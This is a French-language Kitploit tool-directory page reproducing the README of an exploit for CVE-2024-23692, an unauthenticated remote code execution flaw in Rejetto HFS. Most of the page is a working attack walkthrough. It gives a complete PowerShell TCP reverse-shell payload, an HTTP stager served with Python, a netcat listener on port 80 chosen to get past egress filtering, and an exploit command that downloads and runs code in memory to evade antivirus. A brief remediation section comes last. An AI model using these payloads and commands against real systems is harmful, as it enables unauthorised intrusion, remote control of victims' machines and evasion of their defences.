Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-23692 — Automatise l'exploitation de CVE-2024-23692 contre les Rejetto HFS non corrigés, avec un reverse shell PowerShell en mémoire, un staging de payload HTTP et un contournement des écritures disque AV/EDR pour les engagements red team autorisés. | Kitploit
Outils/GitHubGitHub/sandimfz/cve-2024-23692
Génération de PayloadsExploitationExploitation d'Applications WebCommandement et ContrôleRed Teaming
GitHubsandimfz/cve-2024-23692

CVE-2024-23692

Automatise l'exploitation de CVE-2024-23692 contre les Rejetto HFS non corrigés, avec un reverse shell PowerShell en mémoire, un staging de payload HTTP et un contournement des écritures disque AV/EDR pour les engagements red team autorisés.

Voir le dépôt
17il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-23692 - Exécution de code à distance (RCE) sur Rejetto HFS

Une documentation tactique et un guide d'exploitation pour CVE-2024-23692, une vulnérabilité critique d'exécution de code à distance (RCE) non authentifiée affectant les versions de Rejetto HTTP File Server (HFS) antérieures à 2.3m. Ce guide exploite une technique de Reverse Shell en mémoire (RAM uniquement) pour contourner avec succès les détections antivirus/EDR basées sur les signatures lors de l'écriture sur disque.

Avertissement : Ce dépôt et son contenu sont strictement destinés aux évaluations de sécurité autorisées, aux missions de tests d'intrusion, aux simulations de bug bounty et aux audits forensiques défensifs. Toute utilisation non autorisée contre des environnements tiers est strictement illégale.


Crédits et références

Le modèle de vérification automatisée mis en œuvre dans ce workflow de preuve de concept s'appuie sur le dépôt public développé par :

  • Source du script d'exploitation : VeryLazyTech - CVE-2024-23692

Workflow d'exploitation (Reverse Shell en mémoire)

Cette méthode intègre un modèle de déploiement de stager HTTP pour livrer dynamiquement une chaîne de payload textuelle dans l'environnement cible, invoquant une exécution en direct directement depuis la mémoire volatile du système (RAM).

Étape 1 : Préparer le script de payload

Sur votre serveur C2/attaquant local, créez un fichier texte statique nommé index.html et remplissez-le avec le code de boucle TCP Socket PowerShell suivant :

\$c = New-Object System.Net.Sockets.TCPClient('<LHOST>',80);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){;\$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i);\$sb = (iex \$d 2>&1 | Out-String );\$sb2 = \$sb + 'PS ' + (pwd).Path + '> ';\$sbt = ([text.encoding]::ASCII).GetBytes(\$sb2);\$s.Write(\$sbt,0,\$sbt.Length);\$s.Flush()};\$c.Close()

Étape 2 : Lancer le serveur web léger

Ouvrez une instance de terminal dans le dossier de staging désigné contenant votre fichier de modèle de payload, puis lancez un listener HTTP Python instantané sur un port alternatif (par exemple, 8080) :

python3 -m http.server 8080

Étape 3 : Initialiser le listener réseau

Ouvrez une seconde session de terminal indépendante pour héberger le callback de shell persistant entrant. Il est fortement recommandé d'utiliser le port 80 (ou 443) pour contourner facilement les mesures de protection périmétrique sortantes (filtrage de pare-feu en sortie) :

sudo nc -lvnp 80

Étape 4 : Déclencher l'exploit RCE

Lancez le moteur de validation automatisé ciblant votre infrastructure de déploiement. L'appel cible intercepte l'analyse des commandes via un wrapper d'exécution CMD localisé pour maintenir une stabilité optimale des chaînes sans perdre les indicateurs de paramètres :

./CVE-2024-23692.sh http://<TARGET_IP>:<PORT> "cmd /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>')\""

Screenshot

Remédiation et atténuation

Pour éliminer complètement les compromissions et remédier aux environnements opérationnels vulnérables :

  1. Arrêtez et terminez immédiatement tout processus de déploiement Rejetto HFS en cours d'exécution dans l'arborescence système :
    Get-Process -Name *hfs* | Stop-Process -Force
    
  2. Purgez les fichiers résiduels ou les payloads binaires non authentifiés résidant dans les zones d'écriture publiques :
    Remove-Item -Path "C:\Users\Public\*.exe" -Force -ErrorAction SilentlyContinue
    
  3. Mettez à niveau les actifs de déploiement vers la version stable corrigée ou migrez l'infrastructure d'intégration vers des plateformes alternatives modernes et sécurisées.
Télécharger l’outil